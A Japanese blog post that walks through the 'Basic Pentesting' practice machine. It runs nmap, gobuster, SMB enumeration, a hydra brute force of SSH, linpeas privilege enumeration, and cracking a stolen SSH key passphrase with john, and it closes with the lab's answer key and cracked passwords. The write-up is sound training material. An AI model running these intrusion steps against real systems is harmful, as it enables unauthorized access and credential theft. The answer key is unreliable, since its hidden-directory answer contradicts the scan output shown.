← Blog 一覧へ

毎日ハッキング練習

·5 min read
ハッキング

こんにちは、ほたかっち です。気が向いたらハッキング練習の記事を書きたいなと思います。

環境構築などはこちらの記事にまとめています。

今回ハッキングしていくのはBasic Pentestingです。

今回のタスク

  • What is the name of the hidden directory on the web server(enter name without /)?
  • What is the username?
  • What is the password?
  • What service do you use to access the server(answer in abbreviation in all caps)?
  • What is the name of the other user you found(all lower case)?
  • What is the final password you obtain?

ハッキングしていく

まず初めにトップページにアクセスしてみる
トップページ
特に何もなかった

ソースを見てみると

<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

と書かれていた

特に何もない…

とりあえず空いているポートを調べてみる

nmap -sV -oN nmap.log 00.00.000.000

結果が出るまで時間がかかるので次をやってもいいかも

すると

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7

と表示された

次に隠しディレクトリを探していく

gobuster dir -u http://00.00.000.000 -w /usr/share/wordlists/dirb/common.txt -x php,html -t 20

すると

development          (Status: 301) [Size: 320]

アクセスできそうなものを見つけた
dayhack2
文章を読むと jさん と kさん がいるみたい
しかも jさん のパスワードが弱いらしい

まずは情報収集をする

enum4linux -a 00.00.000.000

ユーザーの情報をゲットすることができなかった
ただanonymousにアクセスできている

[*] Check for anonymous access (null session)
[+] Server allows authentication via username '' and password ''

そこで中身を見てみよう

smbclient //00.00.000.000/Anonymous -N

中を見ると jan と kay がいることがわかった

そこで janさん にパスワードクラッキングをする

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://00.00.000.000

これでパスワードがわかりましたね

次にsshで接続をします

ssh jan@00.00.000.000

接続はできたが jan は kay のファイルを見ることはできない

そこで重要そうなのを簡単に探してくれるlinpeasを使う

# 自分のコンソールで
sudo scp /usr/share/peass/linpeas/linpeas.sh name@00.00.000.000:/tmp # 相手のサーバーに送る
sh /tmp/linpeas.sh

/home/kay/.ssh/id_rsaにkayの秘密鍵があった

そこで秘密鍵を使って接続してみる

nvim kay_rsa //ここにさっきの秘密鍵を保存

ただパスワードがわからないので

ssh2john kay_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

これでパスワードがわかったので

ssh -i kay_rsa kay@00.00.000.000

pass.bakにパスワードが書かれていた

これでサーバーを乗っ取れた

答え合わせ

  • What is the name of the hidden directory on the web server(enter name without /)?
    developer
  • What is the username?
    jan
  • What is the password?
    armando
  • What service do you use to access the server(answer in abbreviation in all caps)?
    ssh
  • What is the name of the other user you found(all lower case)?
    kay
  • What is the final password you obtain?
    heresareallystrongpasswordthatfollowsthepasswordpolicy$$

これでハッキングはできました。
最後まで見ていただきありがとうございました。

© 2026 Hotakacchi. All rights reserved.